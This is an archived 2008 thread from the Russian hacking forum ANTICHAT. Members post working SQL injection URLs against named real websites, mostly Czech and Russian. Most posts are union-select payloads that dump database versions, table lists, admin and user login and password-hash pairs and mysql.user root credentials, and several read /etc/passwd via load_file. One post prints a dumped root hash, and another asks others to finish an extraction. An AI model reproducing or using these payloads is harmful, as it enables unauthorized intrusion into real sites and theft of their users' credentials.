ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.07.2008, 19:52
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
ToneZ.NET.RU - Мелодии для мобильных телефонов
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,4,5/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,concat_ws(char (58,58),version(),user(),database()),5/*
version(): 5.0.45-log
user(): u14145@10.10.10.222
database(): u14145
Список таблиц-столбцов получаем так:
Код:
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,table_name,5+from+information_schema.tables/*
http://tonez.net.ru/show.php?model=4+union+select+1,2,3,column_name,5+from+information_schema.columns+where+table_name+like+char(117,115,101,114,115)/*
Таблицы в базе:
Код:
_pictures
authors
baners
bannertext
catalog
content_sup
melodies
mnews
models
mp3
mp3_pictures
mp3_trash
p_authors
p_authors_copy
p_authors_trash
p_melodies
p_melodies_copy
p_melodies_replace
p_melodies_trash
p_pictures
p_popsearch
pictures
popsearch
voice
voice_trash
accgames
brends
car_fmk
car_img
car_info
codes
countries
firmbrends
firmparts
firms
games
genres
kpk
operators
patches
ph_game_images
ph_game_phones
ph_games
ph_genre
ph_phones
ph_top_games
ph_update
phones
q1
sites
subscribe
subscribe_themes
subscribe_users
targeting
towns
users
works
К сожалению, для доступа к самым интересным таблицам (типа users) не хватает прав. Жаль, ведь счастье было так близко... Может быть, здесь:
http://tonez.net.ru/admin
|
|
|
29.07.2008, 19:58
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Miraclemileshopslv.com - PR 4
http://www.miraclemileshopslv.com/entertainment.php?id=-1+union+select+1,unhex(hex(version())),3,4,5,6,7,8 ,9/*&name=FAB+FOUR
Datahop.net - PR 4
http://www.datahop.net/item_datacentres.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10/*
Recko.name - PR 4
http://www.recko.name/index.php?id=-1'+union+select+version()/*&view=articl
Mobilegamefaqs.com - PR 4
http://www.mobilegamefaqs.com/gameinfo.php?id=99999)+union+select+version()/*
Последний раз редактировалось sabe; 29.07.2008 в 20:23..
|
|
|
|
30.07.2008, 00:16
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Nemovitosti.cz - PR 5
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,table_name),v ersion(),4,5,6,7+from+information_schema.tables+li mit+17,1/*
5 версия..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login,passwor d),3,4,5,6,7+from+hartlhaus.webman_user/*
1 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_sk.user+limi t+2,1/*
2 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,login_name,en coded_password),3,4,5,6,7+from++lojza_demo.user+li mit+2,1/*
3 таблица с паролями..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,concat_ws(0x3a,user,password ),3,4,5,6,7+from+mysql.user/*
рут..
http://www.nemovitosti.cz/pravoclanek.php?id=-100007+union+select+1,load_file(0x2F6574632F706173 737764),3,4,5,6,7/*
file_priv y
Ewrc.cz - PR 4
http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,table_name),4 ,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24+from+information_schema.tables+limit +16,1/*
5 версия..
http://www.ewrc.cz/ewrc/show.php?id=-7811+union+select+1,2,concat_ws(0x3a,M_NAME,M_PASS WORD),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+ewrc_cz.user_export/*
юзерпассы )
Vzlu.cz - PR 5
http://www.vzlu.cz/services.php?id=9999999+union+select+concat_ws(0x3 a,database(),user(),version())/*
4 ветка..
http://www.vzlu.cz/services.php?id=9999999+union+select+unhex(hex(con cat_ws(0x3a,version(),user,pass)))+from+users/*
админка
Pragoimex.cz - PR 4
http://www.pragoimex.cz/ru/l.php?id=-40%27+union+select+version()/*
Tvm-valmez.cz - PR 4
http://www.tvm-valmez.cz/index.php?id=109&catit=-104+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46/*
Magick.cz - PR 3
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15/*&co=celej
4 ветка..
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,pas sword),8,9,10,11,12,13,14,15+from+mysql.user/*&co=celej
рут..
http://things.magick.cz/magick/index.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2F6574632F7 06173737764),8,9,10,11,12,13,14,15/*&co=celej
file_priv y
Последний раз редактировалось sabe; 30.07.2008 в 05:09..
|
|
|
|
30.07.2008, 02:52
|
|
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549
Репутация:
301
|
|
Код:
http://www.myspacegamesandvideos.com/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%20concat(char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3%20FROM%20users--
root:7c49f9a7e14cb74eefa0e34f7fd09eb4 |
|
|
|
30.07.2008, 03:28
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.cstore.ru/
http://www.cstore.ru/download.php?id=9999+union+select+1,2,3,4,5,concat _ws(char(32,58,32),user(),database(),version()),7, 8,9,10/*&%20SessionID=89a2d2a4880545b115cc
version = 4.0.27-log
user = qwe1rty@pm9.zenon.net
database = qwe1rty
Не смог подобрать таблички,кто сделает это, буду очень благодарен,если сообщит об этом =)
|
|
|
|
30.07.2008, 03:51
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
http://www.cult.bg/ind_dotCult_full.php?id=-81+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3
User:Root@localhost
Version:5
Только чето сайт какой-то у меня медленный,замучался крутить,так и не докрутил
таблиц со словом forum около 5-8
----
Ресурс очень большой,кажись по кулютуре Болгарии,я бы с радостью раскрутил НО...
Последний раз редактировалось DDoSька; 30.07.2008 в 04:05..
|
|
|
|
30.07.2008, 04:30
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Rave.cz - PR 5
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,version(),9,10,11 ,12,13,14,15,16,17,18,19,unhex(hex(table_name)),21 ,22,23,24,25,26+from+information_schema.tables--
5 ветка.. вот и таблы..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+auth_admin--
это хеши админов..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,hes lo))),21,22,23,24,25,26+from+rave_admin_auth+limit +2,1--
что это за хеш? тоже админов..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users--
вот это уже юзеры..
http://www.rave.cz/clanek.php?id=-11444+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,unhex(hex(concat_ws(0x3a,nick,pas sword))),21,22,23,24,25,26+from+users_zaloha--
и еще юзеры..)
Clovekvtisni.cz - PR 5
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, table_name,table_schema),3+from+information_schema .tables/*
5 версия и таблы..
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, mail,psswd),3+from+apl/*
апликанты))
http://clovekvtisni.cz/index2en.php?id=511+union+select+1,concat_ws(0x3a, email,password),3+from+pinf.users/*
каких то 3 несчастных юзера..
Cagi.cz - PR 5
http://www.cagi.cz/novinka.php?id=-171%27+union+select+1,2,3,version(),5,6/*
Последний раз редактировалось sabe; 30.07.2008 в 20:09..
|
|
|
|
30.07.2008, 07:51
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
тИЦ: 150
http://www.componentace.com/order/?id=-4+union+select+1,2,version(),4,5,6
version() - 5.0.51-log
user() - componentace_c_5@209.61.200.8
database() - componentace_com_5
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
categories
downloads
editions
files
licenses
links
news
options
pages
price
productarticles
products
producttestimonials
testimonials
txtbanners
тИЦ: 150
http://www.taksa-shop.ru/index.php?id=9999999999999+union+select+1,version( )/*
version() - 5.0.32-Debian_7etch5-log
user() - taksa@web.holtglobal.com
database() - taksa_shop_ru
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
SCM4_BABY
SCM4_BBS_IMAGES
SCM4_BBS_INFO
SCM4_BBS_TABLE
SCM4_SHOP
SCM4_SHOP_HISTORY
SCM4_TAKSABASE
SCM4_USERS
applet
billboard
frame
frtext
html
library
links
news
photo
photolink
pitomnic
query
rigging
search
show_detals
show_info
template
text
tree
users
|
|
|
|
30.07.2008, 09:11
|
|
Новичок
Регистрация: 08.02.2008
Сообщений: 2
Провел на форуме:
9294
Репутация:
-12
|
|
http://www.goto.kz/content.php?id=1'
http://www.yuretz.ru/prikol.php?id=471'
http://www.fasie.ru/index.php?rid=1'
http://ocenshik.mostpp.ru/anons.php?id=1'
http://www.milim.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
|
|
|
|
30.07.2008, 09:52
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Expats.cz - PR 6
http://www.expats.cz/prague/event.php?id=-8544+union+select+1,2,3,4,version(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
Cz-usa.com - PR 4
http://www.cz-usa.com/product_detail.php?id=-28+union+select-1,2,version(),4,5,6/*
Revnice.cz - PR 3
http://www.revnice.cz/stranka.php?id=-95+union+select+1,2,3,4,table_name,6+from+informat ion_schema.tables+limit+42,1/*
админка
Последний раз редактировалось sabe; 30.07.2008 в 20:10..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
